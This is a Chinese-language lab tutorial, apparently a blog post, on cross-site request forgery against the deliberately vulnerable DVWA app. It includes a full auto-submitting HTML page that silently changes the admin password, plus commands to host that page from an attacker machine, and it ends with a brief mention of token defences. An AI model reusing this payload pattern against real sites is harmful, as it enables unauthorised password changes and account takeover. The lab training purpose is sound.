CSRF(跨站请求伪造)

🧨 什么是 CSRF?

CSRF(Cross-Site Request Forgery) 是一种攻击方式,诱导已登录的用户浏览器发送未授权请求,比如更改密码、转账等,而用户并未察觉。

攻击前提:

  1. 受害者已登录某网站,并保持登录状态(有 Cookie)。
  2. 攻击者诱导受害者访问一个恶意页面,该页面发出请求到受害者登录的站点。
  3. 服务端认为请求合法,因为带有受害者的 Cookie。

✅ DVWA 中的 CSRF 测试位置:

  1. 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  2. 打开 DVWA Web 界面:http://localhost:8080,用户名:admin,密码:password
  3. 登录后,点击左侧菜单 "CSRF"。
  4. 默认功能是 修改用户密码,就是我们的测试点。

🔥 第一步:构造 CSRF 攻击页面(HTML 文件)

查看修改密码页面的前端代码:

你可以用如下代码,保存为 csrf_attack.html:

bash 复制代码
<!DOCTYPE html>
<html>
  <body>
    <h3>😈 正在发起 CSRF 攻击...</h3>
    <form action="http://localhost:8080/vulnerabilities/csrf/" method="GET">
      <input type="hidden" name="password_new" value="hacked123" />
      <input type="hidden" name="password_conf" value="hacked123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="点我也改密码" />
    </form>

    <script>
      document.forms[0].submit(); // 自动提交
    </script>
  </body>
</html>

🔄 第二步:启动一个 HTTP 服务器(攻击服务器)

假设你用攻击者机器,运行:

bash 复制代码
python3 -m http.server 8082

然后在浏览器打开:

bash 复制代码
http://<攻击者IP>:8082/csrf_attack.html

如果你已登录 DVWA,访问该页面就会修改你的密码。

输入网址后回车结果:

✅ 第三步:验证密码是否被改了

回到 DVWA,尝试用新密码登录:

  • 用户名:admin
  • 密码:hacked123

🧱 防御思路(了解):

DVWA 高安全等级下会引入 CSRF Token 防护机制,攻击者无法伪造。

相关推荐
阿杰学AI2 天前
AI核心知识83——大语言模型之 AI伦理审查员(简洁且通俗易懂版)
人工智能·ai·语言模型·自然语言处理·aigc·安全性测试·ai伦理审查员
国科安芯5 天前
面向星载芯片原子钟的RISC-V架构MCU抗辐照特性研究及可靠性分析
单片机·嵌入式硬件·架构·制造·risc-v·pcb工艺·安全性测试
介一安全5 天前
OSS-Fuzz 模糊测试使用指南
测试工具·安全性测试·fuzz
国科安芯7 天前
航空级PMSM驱动系统中MCU的故障诊断与容错控制策略研究
单片机·嵌入式硬件·安全·架构·制造·安全性测试
国科安芯7 天前
星载通信载荷电源管理芯片的 SEE/TID 测试方法与在轨可靠性评估
嵌入式硬件·架构·制造·安全性测试
安全渗透Hacker9 天前
Nmap自定义NSE脚本实战:从入门到落地
网络安全·安全性测试
国科安芯12 天前
永磁同步电机驱动控制系统中MCU的抗干扰设计
单片机·嵌入式硬件·性能优化·架构·安全性测试
国科安芯13 天前
商业卫星轴角转换器的抗辐照MCU尺寸约束研究
单片机·嵌入式硬件·架构·安全性测试
国科安芯14 天前
商业航天高可靠PCBA制造:抗辐射CAN收发器SMT贴装关键技术及系统级挑战
单片机·嵌入式硬件·制造·pcb工艺·安全性测试
吉吉6114 天前
ThinkPHP5.0.15框架注入复现详细过程
web安全·php·安全性测试